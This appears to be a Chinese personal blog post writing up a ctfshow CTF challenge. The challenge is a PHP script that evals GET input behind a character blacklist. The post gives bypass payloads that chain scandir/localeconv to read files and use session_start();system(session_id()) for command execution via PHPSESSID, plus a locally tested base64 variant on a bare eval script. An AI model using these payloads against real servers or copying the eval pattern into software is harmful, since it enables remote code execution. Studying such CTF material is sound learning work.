期末考考完了应该继续学习网安了。
之前一段时间去尝试挖cnvd,也是混到了自己的第一张cnvd证书,虽然是没有什么技术含量的洞,但也让我觉得很开心。放出来分享一下
但证书都是次要的,重要的是自己能力的提升。
之前买了ctfshow的vip题,遇到了一个之前不知道的trick,记录一下。
源码
<?php
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
这题给了两个解法 第一种解法跟[GXYCTF2019]禁止套娃的解法一样
?c=highlight_file(next(next(next(scandir(current(localeconv()))))));
localeconv() 函数返回一包含本地数字及货币格式信息的数组。
scandir() 列出 images 目录中的文件和目录。
readfile() 输出一个文件。
current() 返回数组中的当前单元, 默认取第一个值。
pos() current() 的别名。
next() 函数将内部指针指向数组中的下一个元素,并输出。
array_reverse()以相反的元素顺序返回数组。
highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。
主要看第二个解法
官方给的wp
c=session_start();system(session_id());
很好懂,但以前没想到过这种解法,学习到了
之后修改PHPSESSID就可以命令执行了
但PHPSESSID只能写入数字和大小写英文字符,所以没有成功读到flag,但可以作为做题的参考。
补充
既然只能传入字母和数字,想着可以用base64解码一下,这样传入的PHPSESSID可以全为字母和数字
但这道题源码里对数字进行了过滤,我们无法使用base64_decode()函数,所以决定本地试一下
测试源码
<?php
$c = $_GET['c'];
eval($c);
payload
?c=session_start();system(base64_decode(session_id()));
执行成功。